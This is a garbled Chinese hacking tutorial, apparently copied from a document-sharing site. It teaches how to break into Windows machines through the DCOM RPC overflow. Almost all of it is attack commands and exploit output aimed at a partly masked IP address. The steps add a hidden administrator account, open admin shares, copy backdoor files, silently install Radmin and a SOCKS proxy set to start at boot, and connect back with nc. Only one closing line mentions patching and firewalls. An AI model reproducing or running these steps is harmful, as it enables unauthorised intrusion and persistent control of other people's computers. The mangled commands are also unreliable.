一步一个脚印，学好入侵

《一步一个脚印，学好入侵》由会员上传分享，免费在线阅读，更多相关内容在学术论文-天天文库。

1、一步一个脚印，学好入侵～教育资源库　　大家好，现在网上很流行drpc，那好就说说利用drpc入侵。很入侵之后做的事情。　　需要的工具：　　　很好的：radmin.exe　　　扫描工具:retinarpcd.exe　　　溢出攻击工具:RpcD（通用溢出工具)　　　脚本开启tel工具：tel.vbeopentel.exeresumetel.exe　　　代理：sksockserver.exe　　　后门程序：target]　　　-p:Attackport[Default:135]　　　-l:Bindshellport[Default:666

2、]　　　Types:　　　0[0x0018759f]:[oteexpl01t-.:[oc192.us]:.Security　　　pliedandrecorrectedbyExpl01t.longker.　　　[+]Resolvinghost..　　　[+]Done.　　　[+]Expl01ting....Just32>　　　接着我们建立用户　　　c:/32>userblueye$1111/add　　　命令成功完成。　　　把用户添加成超级管理员　　　c:/32>localgroupadministratorsblue

3、ye$/add　　　命令成功完成。　　　看看共享开了没有没有的话把共享开开　　　c:/32>share　　　清单是空的。　　　c:/32>shareipc$　　　命令成功完成。　　　c:/32>shareadmin$　　　命令成功完成。　　　到这里我们入侵告一段落　　　[建立IPC$连接，也可以使用tftp上传，先和对方建立连接]　　　F:/hack>use//211.217.50.xx/ipc$1111/user:blueye$　　　[上传一个后门程序到对方的主机里]　　　F:/hack>copyd:

4、/inject.exe//211.217.50.xx/admin$/system32　　　F:/hack>copyd:/tback.dll//211.217.50.xx/admin$/system32　　　然后运行后门程序，我们可以使用at命令。但是有的机器把at明令禁止了，建议直接开起tel　　　使用opentel.exe关闭开启的tel使用resumetel//ipuserpassin，配置好的radmin客户端有4个文件。配置radmin客户端可参12下一页友情提醒：，特别！考相关文章。　　radmin.reg　　　ra

5、ddrv.dll　　　admdll.dll　　　r_server.exe　　　把这个4个文件copyc:/32　　　在目录下面执行命令　　　c:/32>r_server/sradmin.reg-----导入注册表　　　c:/32>r_server/install/silence-----安装radmin.并且不显示托盘　　　c:/32>startr_server-----启动服务　　　安装sock代理　　　把sksockserver.execopyc:/32　　　c:/32>sksockserver/inst

6、all-----安装服务　　　c:/32>sksockserver-configport1234----端口定在1234自己可以改　　　c:/32>sksockserver-configstarttype2----开机自动启动　　　c:/32>startskserver----启动服务　　　最后删除共享　　　shareipc$/del　　　shareadmin$/del　　　在安装radmin的时候你发现有人已经安装了。　　看操作(我输入的内容)　　　后门连接　　　F:/hack>nc211.217.50.x

7、x123456　　　atrixVersion　　　[Melody
]#（pslist）　　　[Melody
]#(pskillr_server)　　　[Melody
]#(shell)　　　c:/32>(delr_server.exe)　　　c:/32>(deladmdll.dll)　　　c:/32>(delraddrv.dll)　　　copy你自己的上去，然后安装　　　省事的办法直接导入注册表，然后重新输入安装命令运行，就可以了，只是在原来默认端口上面架上了密码。　　这时，你就会有疑问了！为什么我输入导入注册表命

8、令不管用呢？出现什么regedit不是可运行的程序之类的。　　出现这样的情况最简单的解决办法tel上去导入试试看，还可以先运行radmin然后在radmin的dos下导入，也是可以的。　　防御办法：　　　安装rpc补丁，使用防火墙过滤